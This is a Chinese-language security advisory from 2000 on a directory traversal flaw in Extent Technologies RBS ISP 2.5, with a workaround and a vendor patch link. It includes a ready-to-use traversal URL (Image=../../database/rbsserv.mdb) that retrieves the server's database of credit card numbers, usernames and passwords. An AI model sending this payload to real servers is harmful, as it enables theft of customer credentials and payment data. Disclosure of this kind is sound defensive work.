发布日期：2000-09-22
更新日期：2000-09-22

受影响系统：

   Extent Technologies RBS ISP 2.5
       - Sun Solaris 2.x
       - RedHat Linux 6.x
       - Microsoft Windows 95/98
       - Microsoft Windows NT 4       
       - Microsoft Windows NT 2000

描述：

---

远程用户通过在URL请求中增加../而访问到本来无权访问的文件，诸如信用卡号、用
户名、口令等等都将泄露。

http://www.victim.com:8002/Newuser?Image=../../database/rbsserv.mdb

<* 来源：anon anon (obscure@cybergoth.i-p.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.victim.com:8002/Newuser?Image=../../database/rbsserv.mdb


建议：

---

临时解决办法：

    NSFOCUS建议您在未得到补丁程序之前先停止使用该程序。

厂商补丁：

    Extent Technologies 针对本问题发布如下解决方案
    http://www.extent.com/solutions/down_prod.shtml


浏览次数：7239
严重程度：0（网友投票）